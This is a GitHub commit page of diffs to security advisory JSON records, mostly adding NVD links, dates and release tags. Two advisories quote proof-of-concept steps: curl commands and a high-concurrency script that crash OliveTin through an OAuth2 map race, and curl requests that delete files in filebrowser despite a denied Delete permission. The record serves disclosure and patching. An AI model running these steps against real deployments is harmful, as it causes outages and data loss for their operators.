Skip to content

Commit edc71ce

Browse files

File tree

advisories/github-reviewed/2026/03/GHSA-43gx-6gv6-3jcp/GHSA-43gx-6gv6-3jcp.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-43gx-6gv6-3jcp",
4-
"modified": "2026-03-02T20:14:23Z",
4+
"modified": "2026-03-05T22:49:44Z",
55
"published": "2026-03-02T20:14:23Z",
66
"aliases": [
77
"CVE-2026-28413"
@@ -81,6 +81,10 @@
8181
"type": "WEB",
8282
"url": "https://github.com/plone/Products.isurlinportal/security/advisories/GHSA-43gx-6gv6-3jcp"
8383
},
84+
{
85+
"type": "ADVISORY",
86+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28413"
87+
},
8488
{
8589
"type": "PACKAGE",
8690
"url": "https://github.com/plone/Products.isurlinportal"
@@ -93,6 +97,6 @@
9397
"severity": "MODERATE",
9498
"github_reviewed": true,
9599
"github_reviewed_at": "2026-03-02T20:14:23Z",
96-
"nvd_published_at": null
100+
"nvd_published_at": "2026-03-05T21:16:22Z"
97101
}
98102
}

advisories/github-reviewed/2026/03/GHSA-45m3-398w-m2m9/GHSA-45m3-398w-m2m9.json

Lines changed: 9 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,11 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-45m3-398w-m2m9",
4-
"modified": "2026-03-02T21:41:36Z",
4+
"modified": "2026-03-05T22:49:34Z",
55
"published": "2026-03-02T21:41:36Z",
6-
"aliases": [],
6+
"aliases": [
7+
"CVE-2026-28789"
8+
],
79
"summary": "OliveTin has unauthenticated DoS via concurrent map writes in OAuth2 state handling",
810
"details": "### Summary\nAn unauthenticated denial-of-service vulnerability exists in OliveTin’s OAuth2 login flow. Concurrent requests to /oauth/login can trigger unsynchronized access to a shared registeredStates map, causing a Go runtime panic (fatal\n error: concurrent map writes) and process termination. This allows remote attackers to crash the service when OAuth2 is enabled.\n\n\n### Details\nThe OAuth2 handler stores per-login state in a shared map without synchronization:\n\n - service/internal/auth/otoauth2/restapi_auth_oauth2.go:24\n registeredStates map[string]*oauth2State\n - Unlocked write in login handler: .../restapi_auth_oauth2.go:141\n - Unlocked read in callback check: .../restapi_auth_oauth2.go:174\n - Unlocked writes in callback flow: .../restapi_auth_oauth2.go:284-285\n - Unlocked read in auth chain check: .../restapi_auth_oauth2.go:376\n\n These paths are network reachable via publicly registered routes:\n```bash\n - service/internal/httpservers/frontend.go:71 → /oauth/login\n - service/internal/httpservers/frontend.go:72 → /oauth/callback\n```\n Because Go HTTP handlers run concurrently, high parallel traffic to /oauth/login causes concurrent map access and runtime panic.\n\n Tested on:\n\n - Container image: ghcr.io/olivetin/olivetin:3000.10.0\n - Source also contains same pattern at commit/tag eb42029b5d0c0633551621288180dd4566b913f7 (3000.10.1)\n\n\n### PoC\n1. Start OliveTin with OAuth2 provider configured (example github), exposing port 1337.\n 2. Confirm baseline:\n```bash\n curl -i http://127.0.0.1:1337/readyz\n curl -i \"http://127.0.0.1:1337/oauth/login?provider=github\"\n```\n Expected: 200 for /readyz, 302 for /oauth/login.\n\n 3. Run concurrency PoC:\n```bash\n python3 /OliveTin/tools/poc_oauth2_state_map_race_dos.py \\\n --base-url http://127.0.0.1:1337 \\\n --provider github \\\n --workers 80 \\\n --requests 120000 \\\n --health-failures 3\n```\n 4. Verify crash:\n\n docker inspect olivetin-dos --format 'status={{.State.Status}} exit={{.State.ExitCode}}'\n docker logs olivetin-dos 2>&1 | grep -E \"fatal error: concurrent map|concurrent map writes|restapi_auth_oauth2.go\"\n\n Observed result:\n\n - Process exited with code 2\n - Logs include:\n - fatal error: concurrent map writes\n - .../internal/auth/otoauth2/restapi_auth_oauth2.go:141 in HandleOAuthLogin\n\n\n\n### Impact\n- Vulnerability type: Race condition (CWE-362) leading to DoS.\n - Attacker requirements: network access only; no authentication required for exploit path.\n - Impacted deployments: OliveTin instances with OAuth2 enabled and reachable over network.\n - Security impact: remote unauthenticated attacker can repeatedly crash OliveTin, causing availability loss until restart/recovery.\n \n[poc_oauth2_state_map_race_dos.py](https://github.com/user-attachments/files/25577901/poc_oauth2_state_map_race_dos.py)",
911
"severity": [
@@ -38,6 +40,10 @@
3840
"type": "WEB",
3941
"url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-45m3-398w-m2m9"
4042
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28789"
46+
},
4147
{
4248
"type": "WEB",
4349
"url": "https://github.com/OliveTin/OliveTin/commit/f044d90d5525c4c8e3f421b32ed7eff771c22d36"
@@ -56,6 +62,6 @@
5662
"severity": "HIGH",
5763
"github_reviewed": true,
5864
"github_reviewed_at": "2026-03-02T21:41:36Z",
59-
"nvd_published_at": null
65+
"nvd_published_at": "2026-03-05T20:16:16Z"
6066
}
6167
}

advisories/github-reviewed/2026/03/GHSA-4fqm-6fmh-82mq/GHSA-4fqm-6fmh-82mq.json

Lines changed: 10 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-4fqm-6fmh-82mq",
4-
"modified": "2026-03-04T01:57:09Z",
4+
"modified": "2026-03-05T22:49:37Z",
55
"published": "2026-03-02T21:42:12Z",
66
"aliases": [
77
"CVE-2026-28790"
@@ -40,13 +40,21 @@
4040
"type": "WEB",
4141
"url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-4fqm-6fmh-82mq"
4242
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28790"
46+
},
4347
{
4448
"type": "WEB",
4549
"url": "https://github.com/OliveTin/OliveTin/commit/d9804182eae43cf49f735e6533ddbe1541c2b9a9"
4650
},
4751
{
4852
"type": "PACKAGE",
4953
"url": "https://github.com/OliveTin/OliveTin"
54+
},
55+
{
56+
"type": "WEB",
57+
"url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.0"
5058
}
5159
],
5260
"database_specific": {
@@ -58,6 +66,6 @@
5866
"severity": "HIGH",
5967
"github_reviewed": true,
6068
"github_reviewed_at": "2026-03-02T21:42:12Z",
61-
"nvd_published_at": null
69+
"nvd_published_at": "2026-03-05T20:16:16Z"
6270
}
6371
}

advisories/github-reviewed/2026/03/GHSA-79pf-vx4x-7jmm/GHSA-79pf-vx4x-7jmm.json

Lines changed: 13 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-79pf-vx4x-7jmm",
4-
"modified": "2026-03-04T22:38:01Z",
4+
"modified": "2026-03-05T22:50:21Z",
55
"published": "2026-03-04T22:38:01Z",
66
"aliases": [
77
"CVE-2026-29188"
@@ -10,8 +10,8 @@
1010
"details": "### Summary\n\nA broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected.\n\n### Details\n\nThe tusDeleteHandler function in http/tus_handlers.go incorrectly gates the DELETE operation behind Perm.Create instead of Perm.Delete:\n\n```go\n// http/tus_handlers.go - tusDeleteHandler (VULNERABLE)\nfunc tusDeleteHandler(cache UploadCache) handleFunc {\n return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {\n if r.URL.Path == \"/\" || !d.user.Perm.Create { // ← Wrong permission checked\n return http.StatusForbidden, nil\n }\n // ...\n err = d.user.Fs.RemoveAll(r.URL.Path) // File is deleted\n```\n\nThe correct resourceDeleteHandler in http/resource.go properly checks Perm.Delete:\n\n```go\n// http/resource.go - resourceDeleteHandler (CORRECT)\nfunc resourceDeleteHandler(fileCache FileCache) handleFunc {\n return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {\n if r.URL.Path == \"/\" || !d.user.Perm.Delete { // ← Correct permission\n return http.StatusForbidden, nil\n }\n```\n\nThis inconsistency means that DELETE /api/tus/{path} and DELETE /api/resources/{path} enforce entirely different permission models for the same underlying filesystem operation. The TUS endpoint was introduced to support resumable uploads (http/tus_handlers.go) and its DELETE handler is intended to cancel in-progress uploads -however, the RemoveAll call permanently removes the file from the filesystem regardless of how the upload was initiated.\n\n### Proposed fix:\n\n```go\n// http/tus_handlers.go\n- if r.URL.Path == \"/\" || !d.user.Perm.Create {\n+ if r.URL.Path == \"/\" || !d.user.Perm.Delete {\n```\n\n### PoC\n\n- filebrowser built from latest master (git clone https://github.com/filebrowser/filebrowser) \n- Tested on: Kali Linux, go version go1.23+\n\n### Setup section\n\n```bash\n# Build and initialize\ngit clone https://github.com/filebrowser/filebrowser\ncd filebrowser\ngo build -o filebrowser .\n./filebrowser config init\n\n# Create a test user with Create=true but Delete=false\n./filebrowser users add testuser SuperSecurePassword1234 \\\n --perm.create=true \\\n --perm.delete=false\n\n# Start server\n./filebrowser &\n```\n\n### POC script steps\n\n1. Confirm the Delete permission is correctly enforced on the standard endpoint:\n\n```bash\nTOKEN=$(curl -s -X POST localhost:8080/api/login \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"testuser\",\"password\":\"SuperSecurePassword1234\"}')\n\n# Attempt deletion via the standard resource endpoint → should be blocked\ncurl -s -X DELETE \"localhost:8080/api/resources/target.txt\" \\\n -H \"X-Auth: $TOKEN\" \\\n -w \"HTTP Status: %{http_code}\\n\"\n\n# Expected: HTTP Status: 403\n```\n\n2. Bypass via the TUS Delete endpoint:\n\n```bash\n# Initiate a TUS upload to register the file in the upload cache\ncurl -s -X POST \"localhost:8080/api/tus/target.txt\" \\\n -H \"X-Auth: $TOKEN\" \\\n -H \"Upload-Length: 18\" \\\n -w \"HTTP Status: %{http_code}\\n\"\n\n# Expected: HTTP Status: 201\n\n# Now delete via the TUS endpoint - Perm.Delete is NOT checked\ncurl -s -X DELETE \"localhost:8080/api/tus/target.txt\" \\\n -H \"X-Auth: $TOKEN\" \\\n -w \"HTTP Status: %{http_code}\\n\"\n\n# Expected: HTTP Status: 204 ← File deleted despite Perm.Delete=false\n```\n\n**Observed results:**\n```\nDELETE /api/resources/target.txt --> 403 Forbidden ( permission enforced )\nDELETE /api/tus/target.txt --> 204 No Content ( permission bypassed )\n```\n\n### Impact\nThis is a broken access control vulnerability (IDOR / permission model bypass). It affects any filebrowser deployment where:\n\n- Multiple users share a single instance, and\n- An administrator has explicitly set Perm.Delete=false for one or more users to restrict destructive operations\n\nAn attacker (authenticated user with Perm.Create=true) can permanently delete any file or directory within their assigned scope-including files they did not create - by initiating a TUS upload against the target path and immediately issuing a TUS DELETE request. This completely undermines the intended access control model, as administrators have no reliable way to prevent file deletion for users who retain upload rights.",
1111
"severity": [
1212
{
13-
"type": "CVSS_V4",
14-
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
1515
}
1616
],
1717
"affected": [
@@ -43,23 +43,31 @@
4343
"type": "WEB",
4444
"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm"
4545
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29188"
49+
},
4650
{
4751
"type": "WEB",
4852
"url": "https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f"
4953
},
5054
{
5155
"type": "PACKAGE",
5256
"url": "https://github.com/filebrowser/filebrowser"
57+
},
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1"
5361
}
5462
],
5563
"database_specific": {
5664
"cwe_ids": [
5765
"CWE-284",
5866
"CWE-732"
5967
],
60-
"severity": "MODERATE",
68+
"severity": "CRITICAL",
6169
"github_reviewed": true,
6270
"github_reviewed_at": "2026-03-04T22:38:01Z",
63-
"nvd_published_at": null
71+
"nvd_published_at": "2026-03-05T21:16:23Z"
6472
}
6573
}

advisories/github-reviewed/2026/03/GHSA-hw26-mmpg-fqfg/GHSA-hw26-mmpg-fqfg.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-hw26-mmpg-fqfg",
4-
"modified": "2026-03-02T19:19:15Z",
4+
"modified": "2026-03-05T22:49:20Z",
55
"published": "2026-03-02T19:19:15Z",
66
"aliases": [
77
"CVE-2026-28348"
@@ -43,6 +43,10 @@
4343
"type": "WEB",
4444
"url": "https://github.com/fedora-python/lxml_html_clean/security/advisories/GHSA-hw26-mmpg-fqfg"
4545
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28348"
49+
},
4650
{
4751
"type": "WEB",
4852
"url": "https://github.com/fedora-python/lxml_html_clean/commit/2ef732667ddbc74ea59847bcf24b75809aaeed3b"
@@ -59,6 +63,6 @@
5963
"severity": "MODERATE",
6064
"github_reviewed": true,
6165
"github_reviewed_at": "2026-03-02T19:19:15Z",
62-
"nvd_published_at": null
66+
"nvd_published_at": "2026-03-05T20:16:16Z"
6367
}
6468
}

advisories/github-reviewed/2026/03/GHSA-jrqm-vmqc-gm93/GHSA-jrqm-vmqc-gm93.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-jrqm-vmqc-gm93",
4-
"modified": "2026-03-04T18:49:32Z",
4+
"modified": "2026-03-05T22:49:17Z",
55
"published": "2026-03-04T18:49:32Z",
66
"aliases": [
77
"CVE-2026-28343"
@@ -59,6 +59,10 @@
5959
"type": "WEB",
6060
"url": "https://github.com/ckeditor/ckeditor5/security/advisories/GHSA-jrqm-vmqc-gm93"
6161
},
62+
{
63+
"type": "ADVISORY",
64+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28343"
65+
},
6266
{
6367
"type": "PACKAGE",
6468
"url": "https://github.com/ckeditor/ckeditor5"
@@ -75,6 +79,6 @@
7579
"severity": "MODERATE",
7680
"github_reviewed": true,
7781
"github_reviewed_at": "2026-03-04T18:49:32Z",
78-
"nvd_published_at": null
82+
"nvd_published_at": "2026-03-05T20:16:16Z"
7983
}
8084
}

advisories/github-reviewed/2026/03/GHSA-mr74-928f-rw69/GHSA-mr74-928f-rw69.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-mr74-928f-rw69",
4-
"modified": "2026-03-02T21:59:27Z",
4+
"modified": "2026-03-05T22:49:48Z",
55
"published": "2026-03-02T20:15:46Z",
66
"aliases": [
77
"CVE-2026-28492"
@@ -43,6 +43,10 @@
4343
"type": "WEB",
4444
"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-mr74-928f-rw69"
4545
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28492"
49+
},
4650
{
4751
"type": "WEB",
4852
"url": "https://github.com/filebrowser/filebrowser/commit/31194fb57a5b92e7155219d7ec7273028fcb2e83"
@@ -63,6 +67,6 @@
6367
"severity": "HIGH",
6468
"github_reviewed": true,
6569
"github_reviewed_at": "2026-03-02T20:15:46Z",
66-
"nvd_published_at": null
70+
"nvd_published_at": "2026-03-05T21:16:22Z"
6771
}
6872
}

advisories/github-reviewed/2026/03/GHSA-p4v8-rw59-93cq/GHSA-p4v8-rw59-93cq.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-p4v8-rw59-93cq",
4-
"modified": "2026-03-03T17:59:31Z",
4+
"modified": "2026-03-05T22:49:05Z",
55
"published": "2026-03-03T17:59:30Z",
66
"aliases": [
77
"CVE-2026-28223"
@@ -97,6 +97,10 @@
9797
"type": "WEB",
9898
"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-p4v8-rw59-93cq"
9999
},
100+
{
101+
"type": "ADVISORY",
102+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28223"
103+
},
100104
{
101105
"type": "WEB",
102106
"url": "https://github.com/wagtail/wagtail/commit/1c6f2effed68f4ccad6fbd07987e03641505f863"
@@ -141,6 +145,6 @@
141145
"severity": "MODERATE",
142146
"github_reviewed": true,
143147
"github_reviewed_at": "2026-03-03T17:59:30Z",
144-
"nvd_published_at": null
148+
"nvd_published_at": "2026-03-05T20:16:15Z"
145149
}
146150
}

advisories/github-reviewed/2026/03/GHSA-p5cm-246w-84jm/GHSA-p5cm-246w-84jm.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-p5cm-246w-84jm",
4-
"modified": "2026-03-03T17:57:19Z",
4+
"modified": "2026-03-05T22:49:01Z",
55
"published": "2026-03-03T17:57:18Z",
66
"aliases": [
77
"CVE-2026-28222"
@@ -97,6 +97,10 @@
9797
"type": "WEB",
9898
"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-p5cm-246w-84jm"
9999
},
100+
{
101+
"type": "ADVISORY",
102+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28222"
103+
},
100104
{
101105
"type": "WEB",
102106
"url": "https://github.com/wagtail/wagtail/commit/0375094bb57ce6e527005c2bb2e871dd20bca04d"
@@ -141,6 +145,6 @@
141145
"severity": "MODERATE",
142146
"github_reviewed": true,
143147
"github_reviewed_at": "2026-03-03T17:57:18Z",
144-
"nvd_published_at": null
148+
"nvd_published_at": "2026-03-05T20:16:15Z"
145149
}
146150
}

advisories/github-reviewed/2026/03/GHSA-pc8g-78pf-4xrp/GHSA-pc8g-78pf-4xrp.json

Lines changed: 10 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-pc8g-78pf-4xrp",
4-
"modified": "2026-03-02T18:49:27Z",
4+
"modified": "2026-03-05T22:49:13Z",
55
"published": "2026-03-02T18:49:27Z",
66
"aliases": [
77
"CVE-2026-28342"
@@ -40,13 +40,21 @@
4040
"type": "WEB",
4141
"url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-pc8g-78pf-4xrp"
4242
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28342"
46+
},
4347
{
4448
"type": "WEB",
4549
"url": "https://github.com/OliveTin/OliveTin/commit/2eb5f0ba79d4bbef3c802bf8b4666a7e18dcfd90"
4650
},
4751
{
4852
"type": "PACKAGE",
4953
"url": "https://github.com/OliveTin/OliveTin"
54+
},
55+
{
56+
"type": "WEB",
57+
"url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.10.2"
5058
}
5159
],
5260
"database_specific": {
@@ -57,6 +65,6 @@
5765
"severity": "HIGH",
5866
"github_reviewed": true,
5967
"github_reviewed_at": "2026-03-02T18:49:27Z",
60-
"nvd_published_at": null
68+
"nvd_published_at": "2026-03-05T20:16:15Z"
6169
}
6270
}

0 commit comments

Comments
 (0)